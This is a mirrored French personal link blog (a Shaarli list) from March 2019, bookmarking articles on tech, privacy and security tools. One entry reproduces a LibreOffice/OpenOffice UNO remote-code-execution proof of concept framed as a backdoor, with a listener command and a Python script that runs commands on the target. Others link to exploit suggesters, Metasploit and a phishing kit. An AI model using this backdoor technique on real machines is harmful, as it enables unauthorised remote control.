PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links

⇐ retour index

YouTube - Can Humans Sense Magnetic Fields?

2019-03-24T20:45:26+01:00
Intéressant
(Réponse: oui)
Permalink

Le hacker geohot a peur que l'humanité ne soit qu'une simulation et veut l'en libérer - Le Hollandais Volant

2019-03-24T11:31:45+01:00
Il se lance dans le social engineering.
Permalink

Note : fréquence NTP - Le Hollandais Volant

2019-03-22T14:09:15+01:00
sudo nano /etc/ntp.conf
> server ntp.ubuntu.com iburst
# devient :
> server ntp.ubuntu.com iburst minpoll 12 maxpoll 17

sudo systemctl restart ntp
Permalink

GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester

2019-03-22T11:20:08+01:00

Permalink

Google goo.gl URL Shortener Closing March 30, 2019 - Liens en vrac de sebsauvage

2019-03-21T15:42:34+01:00
Bah oui, les raccourcisseurs d'URL, raccourcissent aussi leur vie.
Permalink

Buffer Overflow Practical Examples , ret2libc - protostar stack6 | 0xRick Owned Root !

2019-03-21T11:45:26+01:00

Permalink

PHP: filter_var - Manual

2019-03-20T15:45:00+01:00
https://secure.php.net/manual/fr/function.filter-var.php
https://secure.php.net/manual/fr/function.filter-var-array.php
https://php.net/manual/fr/filter.filters.validate.php
https://secure.php.net/manual/fr/filter.filters.sanitize.php
https://secure.php.net/manual/fr/filter.filters.php

$var = filter_var('0755', FILTER_VALIDATE_INT, $options);
$var = filter_var('уникум@из.рф', FILTER_VALIDATE_EMAIL);
$var = filter_var('oops', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);

$data = [ "a" => 42, "b" => "tes%00t", "plop" => "yo"];
$args = [ "a" => FILTER_VALIDATE_INT, "b" => FILTER_SANITIZE_ENCODED];
var_dump(filter_var_array($data, $args));
Permalink

Control Android Devices From Your Desktop With scrcpy (Ubuntu, Fedora, Debian, Linux Mint Installation) - Linux Uprising Blog

2019-03-19T14:27:25+01:00
via https://sebsauvage.net/links/?21CrwQ
Permalink

Msfconsole Commands - Metasploit Unleashed

2019-03-15T16:15:26+01:00

Permalink

Déploiement de la 5G : l'Allemagne victime collatérale du bras de fer opposant Huawei aux USA - Cyberguerre

2019-03-15T15:52:12+01:00
Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
Permalink

Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

2019-03-15T14:43:24+01:00
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

2019-03-15T11:02:27+01:00
https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
Permalink

Category:Metasploitable - charlesreid1

2019-03-15T10:16:09+01:00

Permalink

DARPA Is Building a $10 Million, Open Source, Secure Voting System - Motherboard

2019-03-15T09:44:21+01:00
à suivre
Permalink

GitHub - rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

2019-03-14T10:32:19+01:00

Permalink

DEEP DARK & ACID TECHNO MIX 2018 | MAKE ACID GREAT AGAIN - YouTube

2019-03-14T09:56:34+01:00
via https://www.nothing-is-3d.com/links/?2uh_yw
Permalink

GitHub - thelinuxchoice/blackeye: The most complete Phishing Tool, with 32 templates +1 customizable

2019-03-14T09:32:47+01:00
Quelqu'un a créé un outil de phishing qui copie 32 sites.
Permalink

ArchiveBox – Un clone d’Archive.org à héberger vous-même – Korben

2019-03-13T17:17:58+01:00
https://github.com/pirate/ArchiveBox
https://github.com/pirate/ArchiveBox/wiki/Usage
https://archive.sweeting.me/
Permalink

Désabonnez-moi ! | ploum.net

2019-03-12T14:35:37+01:00
Note :
«
Bonjour,

En vertu de la loi RGPD, pourriez-vous m’informer de la manière par laquelle vous avez obtenu mes coordonnées et effacer toutes données me concernant de vos différentes bases de données. Si vous les avez acquises, merci de me donner les coordonnées de votre fournisseur.

Bien à vous,
»

via https://sebsauvage.net/links/?kGupXg
Permalink

ffmpeg, la boite à outils multimédia - Documentation - Wiki - Linuxtricks

2019-03-10T14:09:52+01:00
via http://abel.antunes.free.fr/shaarli/index.php5?wnjmEA
Permalink